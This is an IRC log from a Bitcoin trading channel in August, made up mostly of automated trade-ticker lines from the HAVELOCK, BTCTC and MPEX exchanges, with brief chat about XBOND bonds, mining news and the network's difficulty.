[HAVELOCK] [XBOND] 1000 @ 0.00117 = 1.17 BTC [-] Aug 19 17:10:41 [HAVELOCK] [XBOND] 2061 @ 0.0011709 = 2.4132 BTC [+] Aug 19 17:10:44 [HAVELOCK] [XBOND] 23 @ 0.001171 = 0.0269 BTC [+] Aug 19 17:11:46 [HAVELOCK] [XBOND] 48 @ 0.0011711 = 0.0562 BTC [+] Aug 19 17:11:49 [HAVELOCK] [XBOND] 45 @ 0.001177 = 0.053 BTC [+] Aug 19 17:12:04 [BTCTC] [ASICMINER-PT] 19 @ 3.674 = 69.806 BTC [-] Aug 19 17:12:05 [BTCTC] [ASICMINER-PT] 1 @ 3.67 BTC [-] Aug 19 17:12:06 [BTCTC] [ASICMINER-PT] 2 @ 3.669 = 7.338 BTC [-] Aug 19 17:12:33 Wasn't tat going to release more shares of xbond if it reached over .00105? Aug 19 17:12:49 [HAVELOCK] [SDSTM] 1 @ 0.00543 BTC [+] Aug 19 17:14:04 mircea_popescu: Just curious, how come you decided to associate 1Bitcoin with MPOE shares? Vs say, S.MG, or something new? Aug 19 17:14:51 well smg would have been a little confusing for people. s.mg is not the publisher of eve. Aug 19 17:15:03 i didn;t want that sort of thing, it stinks to me. Aug 19 17:15:04 Rulother, no, I warned that if you overpay for XBOND (whether sold by TATI or anyone) you run the risk of loss in the event we do a callback Aug 19 17:15:10 something new wasn't really worth making. Aug 19 17:15:16 also, tons of s.mpoe shares around so Aug 19 17:15:28 Ah right Aug 19 17:15:32 [BTCTC] [ACTIVEMINING] 68 @ 0.005233 = 0.3558 BTC [-] Aug 19 17:15:34 [BTCTC] [ACTIVEMINING] 15 @ 0.005231 = 0.0785 BTC [-] Aug 19 17:15:35 Not sure where I got that from :) Aug 19 17:15:35 [BTCTC] [ACTIVEMINING] 8 @ 0.005229 = 0.0418 BTC [-] Aug 19 17:15:36 [BTCTC] [ACTIVEMINING] 2 @ 0.005201 = 0.0104 BTC [-] Aug 19 17:15:37 [BTCTC] [ACTIVEMINING] 550 @ 0.0052 = 2.86 BTC [-] Aug 19 17:15:38 [BTCTC] [ACTIVEMINING] 12 @ 0.00517 = 0.062 BTC [-] Aug 19 17:15:39 [BTCTC] [ACTIVEMINING] 142 @ 0.005164 = 0.7333 BTC [-] Aug 19 17:15:40 [BTCTC] [ACTIVEMINING] 699 @ 0.005161 = 3.6075 BTC [-] Aug 19 17:15:41 [BTCTC] [ACTIVEMINING] 1151 @ 0.005161 = 5.9403 BTC [-] Aug 19 17:15:41 [BTCTC] [ACTIVEMINING] 395 @ 0.005115 = 2.0204 BTC [-] Aug 19 17:15:42 [BTCTC] [ACTIVEMINING] 600 @ 0.00511 = 3.066 BTC [-] Aug 19 17:15:43 [BTCTC] [ACTIVEMINING] 720 @ 0.005105 = 3.6756 BTC [-] Aug 19 17:15:45 [BTCTC] [ACTIVEMINING] 192 @ 0.005103 = 0.9798 BTC [-] Aug 19 17:15:46 we've discussed it a lot about whether to try to issue more bonds to control price, but currently we will not Aug 19 17:15:46 [BTCTC] [ACTIVEMINING] 10000 @ 0.005103 = 51.03 BTC [-] Aug 19 17:15:47 [BTCTC] [ACTIVEMINING] 4789 @ 0.005102 = 24.4335 BTC [-] Aug 19 17:15:49 this may change Aug 19 17:16:12 Frankly xbonds has been one of my wiser recent investments lol Aug 19 17:16:57 We tried to make it a desirable buy Aug 19 17:17:22 and mutually beneficial Aug 19 17:19:04 since s.mg got mentioned, a snippet Aug 19 17:19:08 chetty: yeah, that's broken clipping… Aug 19 17:19:08 working on clipping on anyones plan? Aug 19 17:19:08 chetty: it's on mine now Aug 19 17:19:20 we found a bug in cal3d. Aug 19 17:19:55 [BTCTC] [ACTIVEMINING] 30 @ 0.005388 = 0.1616 BTC [+] Aug 19 17:24:44 [BTCTC] [HOSTED-MINING] 14 @ 0.28 = 3.92 BTC [+] Aug 19 17:25:35 The NSA data center in Bluffdale could require as many as 1.7 million gallons of water per day to operate and keep computers cool. Aug 19 17:25:40 obviously, they built it in the desert. Aug 19 17:26:30 [BTCTC] [KENILWORTH] 2 @ 0.00175 = 0.0035 BTC [-] Aug 19 17:35:48 [BTCTC] [TAT.ASICMINER] 9 @ 0.037 = 0.333 BTC [-] Aug 19 17:35:49 [BTCTC] [TAT.ASICMINER] 30 @ 0.037 = 1.11 BTC [-] Aug 19 17:35:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.037 = 0.222 BTC [-] Aug 19 17:35:52 [BTCTC] [TAT.ASICMINER] 100 @ 0.037 = 3.7 BTC [-] Aug 19 17:35:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.037 = 0.074 BTC [-] Aug 19 17:35:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.037 = 0.185 BTC [-] Aug 19 17:37:35 http://gonzalolira.blogspot.ro/2013/07/if-you-are-baby-boomer-you-will-go.html Aug 19 17:37:38 Gonzalo Lira: If You Are A Baby Boomer, You Will Go Bankrupt—If You Stay In America Aug 19 17:37:51 [MPEX] [S.MPOE] 5348 @ 0.00084535 = 4.5209 BTC [-] Aug 19 17:37:52 [MPEX] [S.MPOE] 1202 @ 0.00084162 = 1.0116 BTC [-] Aug 19 17:41:57 [BTCTC] [COGNITIVE] 1 @ 0.336 BTC [+] Aug 19 17:41:58 [BTCTC] [COGNITIVE] 1 @ 0.336 BTC [+] Aug 19 17:42:09 [BTCTC] [TAT.ASICMINER] 6 @ 0.03737 = 0.2242 BTC [+] Aug 19 17:42:42 [BTCTC] [COGNITIVE] 4 @ 0.335 = 1.34 BTC [-] Aug 19 17:47:52 [BTCTC] [CB.IDIFF-O] 25 @ 0.00975 = 0.2438 BTC [+] Aug 19 17:49:20 [HAVELOCK] [AM1] 1 @ 3.72 BTC [+] Aug 19 17:51:51 [BTCTC] [ASICMINER-PT] 1 @ 3.796 BTC [+] Aug 19 17:52:44 [BTCTC] [DMS.SELLING] 20 @ 0.01782 = 0.3564 BTC [+] Aug 19 17:52:58 [BTCTC] [CB.IDIFF-O] 20 @ 0.00975 = 0.195 BTC [+] Aug 19 17:53:10 [BTCTC] [ASICMINER-PT] 1 @ 3.798 BTC [+] Aug 19 17:53:32 [BTCTC] [COGNITIVE] 15 @ 0.3358 = 5.037 BTC [+] Aug 19 17:53:49 [BTCTC] [ASICMINER-PT] 2 @ 3.799 = 7.598 BTC [+] Aug 19 17:54:10 [BTCTC] [CB.IDIFF-O] 27 @ 0.009749 = 0.2632 BTC [-] Aug 19 17:55:28 [BTCTC] [TAT.ASICMINER] 30 @ 0.0368 = 1.104 BTC [-] Aug 19 17:55:41 [BTCTC] [HOSTED-MINING] 2 @ 0.28 = 0.56 BTC [+] Aug 19 17:56:28 [BTCTC] [DMS.MINING] 50 @ 0.003289 = 0.1645 BTC [-] Aug 19 17:56:39 [BTCTC] [COGNITIVE] 2 @ 0.3267 = 0.6534 BTC [-] Aug 19 17:56:40 [BTCTC] [COGNITIVE] 1 @ 0.3267 BTC [-] Aug 19 17:56:42 [BTCTC] [COGNITIVE] 1 @ 0.324 BTC [-] Aug 19 17:57:24 [BTCTC] [HOSTED-MINING] 5 @ 0.28 = 1.4 BTC [+] Aug 19 17:58:00 [BTCTC] [DMS.PURCHASE] 1 @ 0.0207 BTC [+] Aug 19 17:58:44 [BTCTC] [DMS.PURCHASE] 10 @ 0.0207 = 0.207 BTC [+] Aug 19 18:01:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.03732 BTC [+] Aug 19 18:03:28 [BTCTC] [DMS.MINING] 51 @ 0.00329 = 0.1678 BTC [+] Aug 19 18:04:43 [BTCTC] [DMS.MINING] 105 @ 0.003297 = 0.3462 BTC [+] Aug 19 18:06:57 [BTCTC] [DMS.MINING] 90 @ 0.003297 = 0.2967 BTC [+] Aug 19 18:07:19 [BTCTC] [BITVPS] 3 @ 0.002403 = 0.0072 BTC [+] Aug 19 18:08:15 [HAVELOCK] [AM100] 21 @ 0.0369899 = 0.7768 BTC [-] Aug 19 18:09:10 [HAVELOCK] [AM100] 1 @ 0.03699 BTC [+] Aug 19 18:10:34 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 19 18:10:50 May of been posted already, but if not.. Aug 19 18:10:50 http://thegenesisblock.com/cointerra-announces-2ths-asic-bitcoin-miner-for-15750/ Aug 19 18:10:52 Cointerra Announces 2 TH/s ASIC Bitcoin Miner - The Genesis Block Aug 19 18:11:43 [BTCTC] [DMS.MINING] 2 @ 0.003296 = 0.0066 BTC [-] Aug 19 18:12:01 [BTCTC] [DMS.MINING] 2 @ 0.003296 = 0.0066 BTC [-] Aug 19 18:13:05 [BTCTC] [BASIC-MINING] 1 @ 0.284 BTC [-] Aug 19 18:13:07 [BTCTC] [BASIC-MINING] 1 @ 0.2801 BTC [-] Aug 19 18:13:15 [HAVELOCK] [HIM] 10 @ 0.202 = 2.02 BTC [-] Aug 19 18:13:34 [BTCTC] [ACTIVEMINING] 30 @ 0.005183 = 0.1555 BTC [-] Aug 19 18:13:35 [BTCTC] [ACTIVEMINING] 6 @ 0.005184 = 0.0311 BTC [+] Aug 19 18:14:00 [BTCTC] [ACTIVEMINING] 24 @ 0.005331 = 0.1279 BTC [+] Aug 19 18:15:46 [BTCTC] [ACTIVEMINING] 30 @ 0.005323 = 0.1597 BTC [-] Aug 19 18:15:47 [BTCTC] [ACTIVEMINING] 68 @ 0.005324 = 0.362 BTC [+] Aug 19 18:15:49 [BTCTC] [ACTIVEMINING] 30 @ 0.005324 = 0.1597 BTC [+] Aug 19 18:16:51 [BTCTC] [ACTIVEMINING] 6 @ 0.005325 = 0.032 BTC [+] Aug 19 18:16:59 [BTCTC] [ACTIVEMINING] 50 @ 0.005325 = 0.2663 BTC [+] Aug 19 18:17:02 [BTCTC] [DMS.MINING] 74 @ 0.003296 = 0.2439 BTC [-] Aug 19 18:17:22 [BTCTC] [DMS.MINING] 95 @ 0.003297 = 0.3132 BTC [+] Aug 19 18:17:23 [BTCTC] [DMS.MINING] 37 @ 0.003297 = 0.122 BTC [+] Aug 19 18:18:01 [BTCTC] [DMS.MINING] 13 @ 0.003298 = 0.0429 BTC [+] Aug 19 18:18:02 [BTCTC] [DMS.MINING] 72 @ 0.003298 = 0.2375 BTC [+] Aug 19 18:18:04 [BTCTC] [DMS.MINING] 75 @ 0.003298 = 0.2474 BTC [+] Aug 19 18:19:12 .d Aug 19 18:19:16 50810339.04828 | Next Diff in 976 blocks | Estimated Change: 22.9709% in 5d 5h 5m 6s Aug 19 18:19:29 !ticker btctcDMS.SELLING Aug 19 18:19:30 Your actions are useless. Aug 19 18:19:32 !ticker btctc DMS.SELLING Aug 19 18:19:34 [BTCT:DMS.SELLING] 1D: 0.01733 / 0.01758 / 0.01783 (450 shares, 7.9 BTC), 7D: 0.0165 / 0.02011 / 0.0259 (46392 shares, 933.1 BTC), 30D: 0.0165 / 0.02132 / 0.02646 (93878 shares, 2001.8 BTC) Aug 19 18:20:23 [HAVELOCK] [XBOND] 5 @ 0.001177 = 0.0059 BTC [+] Aug 19 18:23:56 [HAVELOCK] [XBOND] 1 @ 0.001177 BTC [+] Aug 19 18:24:42 [HAVELOCK] [AM100] 3 @ 0.036999 = 0.111 BTC [+] Aug 19 18:25:37 [HAVELOCK] [AM100] 22 @ 0.037 = 0.814 BTC [+] Aug 19 18:29:01 [BTCTC] [HOSTED-MINING] 1 @ 0.27 BTC [-] Aug 19 18:30:27 [BTCTC] [ACTIVEMINING] 14 @ 0.005322 = 0.0745 BTC [-] Aug 19 18:30:28 [BTCTC] [ACTIVEMINING] 50 @ 0.005323 = 0.2662 BTC [+] Aug 19 18:30:29 [BTCTC] [ACTIVEMINING] 23 @ 0.005327 = 0.1225 BTC [+] Aug 19 18:30:31 [BTCTC] [ACTIVEMINING] 200 @ 0.005334 = 1.0668 BTC [+] Aug 19 18:31:24 [BTCTC] [DMS.MINING] 37 @ 0.003298 = 0.122 BTC [+] Aug 19 18:38:14 [HAVELOCK] [AM100] 14 @ 0.037 = 0.518 BTC [+] Aug 19 18:41:20 [BTCTC] [LABCOIN] 2 @ 0.001698 = 0.0034 BTC [+] Aug 19 18:41:21 [BTCTC] [LABCOIN] 20 @ 0.001699 = 0.034 BTC [+] Aug 19 18:41:22 [BTCTC] [LABCOIN] 10 @ 0.0017 = 0.017 BTC [+] Aug 19 18:41:23 [BTCTC] [LABCOIN] 85 @ 0.001701 = 0.1446 BTC [+] Aug 19 18:41:25 [BTCTC] [LABCOIN] 6 @ 0.001709 = 0.0103 BTC [+] Aug 19 18:41:26 [BTCTC] [LABCOIN] 50 @ 0.00171 = 0.0855 BTC [+] Aug 19 18:41:27 [BTCTC] [LABCOIN] 16 @ 0.001714 = 0.0274 BTC [+] Aug 19 18:41:28 [BTCTC] [LABCOIN] 130 @ 0.001715 = 0.223 BTC [+] Aug 19 18:41:28 [BTCTC] [LABCOIN] 1 @ 0.001717 BTC [+] Aug 19 18:41:29 [BTCTC] [LABCOIN] 12 @ 0.001718 = 0.0206 BTC [+] Aug 19 18:41:30 [BTCTC] [LABCOIN] 445 @ 0.001719 = 0.765 BTC [+] Aug 19 18:41:31 [BTCTC] [LABCOIN] 3560 @ 0.00172 = 6.1232 BTC [+] Aug 19 18:41:32 [BTCTC] [LABCOIN] 31 @ 0.001729 = 0.0536 BTC [+] Aug 19 18:41:33 [BTCTC] [LABCOIN] 250 @ 0.00173 = 0.4325 BTC [+] Aug 19 18:41:34 [BTCTC] [LABCOIN] 59 @ 0.001734 = 0.1023 BTC [+] Aug 19 18:41:35 [BTCTC] [LABCOIN] 1 @ 0.001735 BTC [+] Aug 19 18:41:36 [BTCTC] [LABCOIN] 500 @ 0.001736 = 0.868 BTC [+] Aug 19 18:41:37 [BTCTC] [LABCOIN] 23 @ 0.001736 = 0.0399 BTC [+] Aug 19 18:42:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005196 = 0.1559 BTC [-] Aug 19 18:42:24 [BTCTC] [ACTIVEMINING] 68 @ 0.005195 = 0.3533 BTC [-] Aug 19 18:42:26 [BTCTC] [ACTIVEMINING] 50 @ 0.005186 = 0.2593 BTC [-] Aug 19 18:42:27 [BTCTC] [ACTIVEMINING] 2 @ 0.005111 = 0.0102 BTC [-] Aug 19 18:42:28 [BTCTC] [ACTIVEMINING] 13 @ 0.00511 = 0.0664 BTC [-] Aug 19 18:42:29 [BTCTC] [ACTIVEMINING] 87 @ 0.005103 = 0.444 BTC [-] Aug 19 18:42:39 [BTCTC] [LABCOIN] 25 @ 0.001736 = 0.0434 BTC [+] Aug 19 18:42:41 [BTCTC] [LABCOIN] 200 @ 0.001737 = 0.3474 BTC [+] Aug 19 18:42:42 [BTCTC] [LABCOIN] 221 @ 0.001738 = 0.3841 BTC [+] Aug 19 18:42:43 [BTCTC] [LABCOIN] 977 @ 0.001739 = 1.699 BTC [+] Aug 19 18:43:36 [MPEX] [S.MPOE] 9348 @ 0.00084162 = 7.8675 BTC [-] Aug 19 18:43:52 [BTCTC] [LABCOIN] 30 @ 0.001732 = 0.052 BTC [-] Aug 19 18:43:53 [BTCTC] [LABCOIN] 85 @ 0.001733 = 0.1473 BTC [+] Aug 19 18:43:55 [BTCTC] [LABCOIN] 23 @ 0.001739 = 0.04 BTC [+] Aug 19 18:43:56 [BTCTC] [LABCOIN] 1000 @ 0.00174 = 1.74 BTC [+] Aug 19 18:43:57 [BTCTC] [LABCOIN] 225 @ 0.00174 = 0.3915 BTC [+] Aug 19 18:43:58 [BTCTC] [LABCOIN] 1000 @ 0.001741 = 1.741 BTC [+] Aug 19 18:43:59 [BTCTC] [LABCOIN] 1000 @ 0.001742 = 1.742 BTC [+] Aug 19 18:44:00 [BTCTC] [LABCOIN] 199 @ 0.001742 = 0.3467 BTC [+] Aug 19 18:44:01 [BTCTC] [LABCOIN] 1000 @ 0.001743 = 1.743 BTC [+] Aug 19 18:44:02 [BTCTC] [LABCOIN] 1000 @ 0.001744 = 1.744 BTC [+] Aug 19 18:44:02 [BTCTC] [LABCOIN] 407 @ 0.001744 = 0.7098 BTC [+] Aug 19 18:44:03 [BTCTC] [LABCOIN] 1555 @ 0.001745 = 2.7135 BTC [+] Aug 19 18:44:04 [BTCTC] [LABCOIN] 2000 @ 0.001746 = 3.492 BTC [+] Aug 19 18:44:06 hmmm Aug 19 18:44:06 [BTCTC] [LABCOIN] 273 @ 0.001746 = 0.4767 BTC [+] Aug 19 18:44:51 [BTCTC] [HOSTED-MINING] 5 @ 0.28 = 1.4 BTC [+] Aug 19 18:45:08 [BTCTC] [LABCOIN] 6 @ 0.001746 = 0.0105 BTC [+] Aug 19 18:45:13 [BTCTC] [LABCOIN] 197 @ 0.001747 = 0.3442 BTC [+] Aug 19 18:46:10 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002441 = 0.0244 BTC [-] Aug 19 18:47:04 [MPEX] [S.MPOE] 1750 @ 0.00084162 = 1.4728 BTC [-] Aug 19 18:47:46 [BTCTC] [KENILWORTH] 1 @ 0.001793 BTC [+] Aug 19 18:51:44 [BTCTC] [LABCOIN] 6 @ 0.001742 = 0.0105 BTC [-] Aug 19 18:51:46 [BTCTC] [LABCOIN] 20 @ 0.001743 = 0.0349 BTC [+] Aug 19 18:51:47 [BTCTC] [LABCOIN] 500 @ 0.001745 = 0.8725 BTC [+] Aug 19 18:51:47 [BTCTC] [LABCOIN] 4803 @ 0.001747 = 8.3908 BTC [+] Aug 19 18:51:48 [BTCTC] [LABCOIN] 7871 @ 0.00175 = 13.7743 BTC [+] Aug 19 18:52:47 [HAVELOCK] [XBOND] 1 @ 0.001177 BTC [+] Aug 19 18:52:56 [BTCTC] [LABCOIN] 95 @ 0.00175 = 0.1663 BTC [+] Aug 19 18:53:52 [BTCTC] [LABCOIN] 4 @ 0.00175 = 0.007 BTC [+] Aug 19 18:55:21 [BTCTC] [DMS.MINING] 100 @ 0.003299 = 0.3299 BTC [+] Aug 19 18:56:47 [BTCTC] [DMS.MINING] 578 @ 0.00332 = 1.919 BTC [+] Aug 19 18:57:55 [BTCTC] [LABCOIN] 20 @ 0.001749 = 0.035 BTC [-] Aug 19 18:57:56 [BTCTC] [LABCOIN] 849 @ 0.00175 = 1.4858 BTC [+] Aug 19 18:57:58 .d Aug 19 18:57:59 50810339.04828 | Next Diff in 973 blocks | Estimated Change: 22.5773% in 5d 5h 33m 12s Aug 19 18:58:23 how about that diff Aug 19 18:59:38 [BTCTC] [ACTIVEMINING] 68 @ 0.005266 = 0.3581 BTC [+] Aug 19 18:59:39 [BTCTC] [ACTIVEMINING] 29 @ 0.005272 = 0.1529 BTC [+] Aug 19 18:59:40 [BTCTC] [ACTIVEMINING] 50 @ 0.005275 = 0.2638 BTC [+] Aug 19 18:59:41 [BTCTC] [ACTIVEMINING] 200 @ 0.005334 = 1.0668 BTC [+] Aug 19 18:59:42 [BTCTC] [ACTIVEMINING] 1004 @ 0.005335 = 5.3563 BTC [+] Aug 19 18:59:43 [BTCTC] [ACTIVEMINING] 120 @ 0.005349 = 0.6419 BTC [+] Aug 19 18:59:44 [BTCTC] [ACTIVEMINING] 600 @ 0.00535 = 3.21 BTC [+] Aug 19 18:59:45 [BTCTC] [ACTIVEMINING] 14 @ 0.005399 = 0.0756 BTC [+] Aug 19 18:59:46 [BTCTC] [ACTIVEMINING] 70 @ 0.0054 = 0.378 BTC [+] Aug 19 18:59:47 [BTCTC] [ACTIVEMINING] 10 @ 0.005427 = 0.0543 BTC [+] Aug 19 18:59:48 [BTCTC] [ACTIVEMINING] 53 @ 0.005428 = 0.2877 BTC [+] Aug 19 18:59:49 [BTCTC] [ACTIVEMINING] 55 @ 0.005449 = 0.2997 BTC [+] Aug 19 18:59:50 [BTCTC] [ACTIVEMINING] 275 @ 0.00545 = 1.4988 BTC [+] Aug 19 18:59:50 [BTCTC] [ACTIVEMINING] 84 @ 0.005489 = 0.4611 BTC [+] Aug 19 18:59:51 [BTCTC] [ACTIVEMINING] 420 @ 0.00549 = 2.3058 BTC [+] Aug 19 18:59:52 [BTCTC] [ACTIVEMINING] 24 @ 0.005494 = 0.1319 BTC [+] Aug 19 18:59:53 [BTCTC] [ACTIVEMINING] 123 @ 0.005495 = 0.6759 BTC [+] Aug 19 18:59:54 [BTCTC] [ACTIVEMINING] 313 @ 0.005499 = 1.7212 BTC [+] Aug 19 18:59:56 [BTCTC] [ACTIVEMINING] 50 @ 0.005499 = 0.275 BTC [+] Aug 19 18:59:57 [BTCTC] [ACTIVEMINING] 1565 @ 0.0055 = 8.6075 BTC [+] Aug 19 18:59:58 [BTCTC] [ACTIVEMINING] 182 @ 0.005506 = 1.0021 BTC [+] Aug 19 18:59:59 [BTCTC] [ACTIVEMINING] 368 @ 0.005507 = 2.0266 BTC [+] Aug 19 19:00:00 [BTCTC] [ACTIVEMINING] 543 @ 0.00551 = 2.9919 BTC [+] Aug 19 19:00:01 [BTCTC] [ACTIVEMINING] 64 @ 0.005527 = 0.3537 BTC [+] Aug 19 19:00:01 [BTCTC] [ACTIVEMINING] 200 @ 0.005528 = 1.1056 BTC [+] Aug 19 19:00:02 [BTCTC] [ACTIVEMINING] 20 @ 0.00553 = 0.1106 BTC [+] Aug 19 19:00:03 [BTCTC] [ACTIVEMINING] 100 @ 0.00553 = 0.553 BTC [+] Aug 19 19:00:04 [BTCTC] [ACTIVEMINING] 17 @ 0.005559 = 0.0945 BTC [+] Aug 19 19:00:05 [BTCTC] [ACTIVEMINING] 85 @ 0.00556 = 0.4726 BTC [+] Aug 19 19:00:06 [BTCTC] [ACTIVEMINING] 291 @ 0.005569 = 1.6206 BTC [+] Aug 19 19:00:07 [BTCTC] [ACTIVEMINING] 30 @ 0.005569 = 0.1671 BTC [+] Aug 19 19:00:30 [BTCTC] [ASICMINER-PT] 1 @ 3.789 BTC [-] Aug 19 19:00:32 [BTCTC] [ASICMINER-PT] 1 @ 3.79 BTC [+] Aug 19 19:01:01 [BTCTC] [ASICMINER-PT] 1 @ 3.794 BTC [+] Aug 19 19:02:17 [BTCTC] [ACTIVEMINING] 390 @ 0.005567 = 2.1711 BTC [-] Aug 19 19:02:38 [BTCTC] [ACTIVEMINING] 2 @ 0.005567 = 0.0111 BTC [-] Aug 19 19:03:18 [BTCTC] [ACTIVEMINING] 8 @ 0.005567 = 0.0445 BTC [-] Aug 19 19:03:34 [BTCTC] [DMS.MINING] 3 @ 0.00332 = 0.01 BTC [+] Aug 19 19:06:55 [BTCTC] [LABCOIN] 16 @ 0.001749 = 0.028 BTC [-] Aug 19 19:06:56 [BTCTC] [LABCOIN] 1181 @ 0.00175 = 2.0668 BTC [+] Aug 19 19:07:16 [HAVELOCK] [XBOND] 16 @ 0.001171 = 0.0187 BTC [-] Aug 19 19:07:51 [BTCTC] [DMS.MINING] 1 @ 0.00332 BTC [+] Aug 19 19:09:47 [BTCTC] [DMS.MINING] 27 @ 0.00332 = 0.0896 BTC [+] Aug 19 19:10:24 [BTCTC] [TAT.MINIGAME] 1 @ 0.000267 BTC [+] Aug 19 19:10:26 [BTCTC] [LABCOIN] 500 @ 0.001755 = 0.8775 BTC [+] Aug 19 19:10:28 [BTCTC] [LABCOIN] 500 @ 0.001758 = 0.879 BTC [+] Aug 19 19:10:29 [BTCTC] [LABCOIN] 2803 @ 0.001764 = 4.9445 BTC [+] Aug 19 19:12:14 [HAVELOCK] [AM100] 20 @ 0.03699 = 0.7398 BTC [-] Aug 19 19:12:16 [HAVELOCK] [AM100] 79 @ 0.0369899 = 2.9222 BTC [-] Aug 19 19:12:18 [HAVELOCK] [AM100] 5 @ 0.0363 = 0.1815 BTC [-] Aug 19 19:12:20 [HAVELOCK] [AM100] 20 @ 0.03621 = 0.7242 BTC [-] Aug 19 19:12:22 [HAVELOCK] [AM100] 1 @ 0.03611 BTC [-] Aug 19 19:12:24 [HAVELOCK] [AM100] 10 @ 0.036101 = 0.361 BTC [-] Aug 19 19:12:27 [HAVELOCK] [AM100] 38 @ 0.03610002 = 1.3718 BTC [-] Aug 19 19:12:29 [HAVELOCK] [AM100] 30 @ 0.03610001 = 1.083 BTC [-] Aug 19 19:12:31 [HAVELOCK] [AM100] 5 @ 0.036 = 0.18 BTC [-] Aug 19 19:12:33 [HAVELOCK] [AM100] 10 @ 0.036 = 0.36 BTC [-] Aug 19 19:12:34 [HAVELOCK] [AM100] 1 @ 0.036 BTC [-] Aug 19 19:12:36 [HAVELOCK] [AM100] 100 @ 0.036 = 3.6 BTC [-] Aug 19 19:12:38 [HAVELOCK] [AM100] 20 @ 0.0356 = 0.712 BTC [-] Aug 19 19:12:40 [HAVELOCK] [AM100] 10 @ 0.0356 = 0.356 BTC [-] Aug 19 19:12:42 [HAVELOCK] [AM100] 10 @ 0.0354 = 0.354 BTC [-] Aug 19 19:12:44 [HAVELOCK] [AM100] 53 @ 0.0351 = 1.8603 BTC [-] Aug 19 19:12:46 [HAVELOCK] [AM100] 7 @ 0.035 = 0.245 BTC [-] Aug 19 19:12:48 [HAVELOCK] [AM100] 20 @ 0.035 = 0.7 BTC [-] Aug 19 19:12:50 [HAVELOCK] [AM100] 340 @ 0.03491 = 11.8694 BTC [-] Aug 19 19:12:52 [HAVELOCK] [AM100] 99 @ 0.03490101 = 3.4552 BTC [-] Aug 19 19:12:54 [HAVELOCK] [AM100] 20 @ 0.0348 = 0.696 BTC [-] Aug 19 19:12:55 [HAVELOCK] [AM100] 20 @ 0.0346 = 0.692 BTC [-] Aug 19 19:12:57 [HAVELOCK] [AM100] 82 @ 0.0345 = 2.829 BTC [-] Aug 19 19:13:55 [BTCTC] [DMS.MINING] 1 @ 0.003259 BTC [-] Aug 19 19:13:57 [BTCTC] [DMS.MINING] 6 @ 0.00325 = 0.0195 BTC [-] Aug 19 19:14:44 [HAVELOCK] [SMG] 17 @ 0.00025 = 0.0043 BTC [-] Aug 19 19:15:03 [BTCTC] [LABCOIN] 23 @ 0.001764 = 0.0406 BTC [+] Aug 19 19:18:11 [BTCTC] [BASIC-MINING] 1 @ 0.2989 BTC [+] Aug 19 19:18:23 [BTCTC] [BASIC-MINING] 2 @ 0.2989 = 0.5978 BTC [+] Aug 19 19:20:24 [MPEX] [S.MPOE] 9100 @ 0.00083956 = 7.64 BTC [-] Aug 19 19:21:48 [BTCTC] [LABCOIN] 30 @ 0.001744 = 0.0523 BTC [-] Aug 19 19:21:50 [BTCTC] [LABCOIN] 20 @ 0.001743 = 0.0349 BTC [-] Aug 19 19:24:12 hahahaha the stupid press Aug 19 19:24:18 https://www.youtube.com/watch?v=YcIbEGjEYTc "bitcoin is legal tender in germany" Aug 19 19:24:22 Bitcoin Bites: Germany recognizes digital currency as 'private money' - YouTube Aug 19 19:25:40 private money for my private time, awwwe yeah Aug 19 19:25:59 yup Aug 19 19:26:15 http://i.imgur.com/Svw7vt7.png Aug 19 19:29:48 [BTCTC] [DMS.MINING] 5 @ 0.00325 = 0.0163 BTC [-] Aug 19 19:30:09 [HAVELOCK] [AM100] 1 @ 0.0377999 BTC [+] Aug 19 19:31:23 [BTCTC] [BASIC-MINING] 6 @ 0.2989 = 1.7934 BTC [+] Aug 19 19:32:16 [BTCTC] [LABCOIN] 50 @ 0.001765 = 0.0883 BTC [+] Aug 19 19:34:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001198 BTC [-] Aug 19 19:34:22 [BTCTC] [BASIC-MINING] 7 @ 0.2989 = 2.0923 BTC [+] Aug 19 19:34:29 [BTCTC] [LABCOIN] 70 @ 0.001794 = 0.1256 BTC [+] Aug 19 19:34:30 [BTCTC] [LABCOIN] 930 @ 0.001796 = 1.6703 BTC [+] Aug 19 19:36:25 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001199 = 0.0048 BTC [+] Aug 19 19:37:37 davout tru dat Aug 19 19:37:49 [HAVELOCK] [AM100] 1 @ 0.0372 BTC [-] Aug 19 19:43:12 [BTCTC] [LABCOIN] 30 @ 0.001771 = 0.0531 BTC [-] Aug 19 19:43:13 [BTCTC] [LABCOIN] 20 @ 0.00177 = 0.0354 BTC [-] Aug 19 19:43:29 [HAVELOCK] [SMG] 1 @ 0.000251 BTC [+] Aug 19 19:44:09 [MPEX] [S.MPOE] 3200 @ 0.00083956 = 2.6866 BTC [-] Aug 19 19:44:43 [HAVELOCK] [AM100] 3 @ 0.0366 = 0.1098 BTC [-] Aug 19 19:45:06 [HAVELOCK] [AM100] 6 @ 0.0366 = 0.2196 BTC [-] Aug 19 19:46:12 .d Aug 19 19:46:14 50810339.04828 | Next Diff in 968 blocks | Estimated Change: 22.5805% in 5d 4h 46m 30s Aug 19 19:46:19 ;;nethash Aug 19 19:46:19 480263.801017 Aug 19 19:54:49 [BTCTC] [LABCOIN] 30 @ 0.001791 = 0.0537 BTC [+] Aug 19 19:54:51 [BTCTC] [LABCOIN] 20 @ 0.001792 = 0.0358 BTC [+] Aug 19 19:54:52 [BTCTC] [LABCOIN] 70 @ 0.001795 = 0.1257 BTC [+] Aug 19 19:54:54 [BTCTC] [LABCOIN] 570 @ 0.001796 = 1.0237 BTC [+] Aug 19 19:54:55 [BTCTC] [LABCOIN] 40 @ 0.001796 = 0.0718 BTC [+] Aug 19 19:54:56 [BTCTC] [LABCOIN] 1007 @ 0.001797 = 1.8096 BTC [+] Aug 19 19:54:57 [BTCTC] [LABCOIN] 30 @ 0.001797 = 0.0539 BTC [+] Aug 19 19:55:11 [BTCTC] [BASIC-MINING] 1 @ 0.2804 BTC [-] Aug 19 19:55:15 [BTCTC] [BASIC-MINING] 1 @ 0.2801 BTC [-] Aug 19 19:55:17 [BTCTC] [BASIC-MINING] 5 @ 0.28 = 1.4 BTC [-] Aug 19 19:55:48 [BTCTC] [HOSTED-MINING] 2 @ 0.28 = 0.56 BTC [+] Aug 19 19:56:24 [BTCTC] 